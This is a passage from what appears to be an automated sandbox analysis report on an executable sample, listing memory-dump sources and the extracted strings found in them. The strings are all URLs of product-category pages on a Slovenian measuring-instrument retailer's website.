in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/merilni-pretvorniki-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/montazni-pribor-za-merilnike-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/procesni-pretvorniki-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/rotronic-merilniki-diferencialnega-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/sistemi-tlacnih-vmesnikov/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacna-stikala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/ventili-in-zascitne-naprave-za-merilnike-tla
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/comet-vlaga-dew-point-monitoring-kalibracija
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/michell-instruments-dew-point-merilniki-tock
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/prenosni-merilniki-vlage-temperature-in-atmo
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/obnove-in-posodobitve-strojev-in-naprav/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/precizna-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 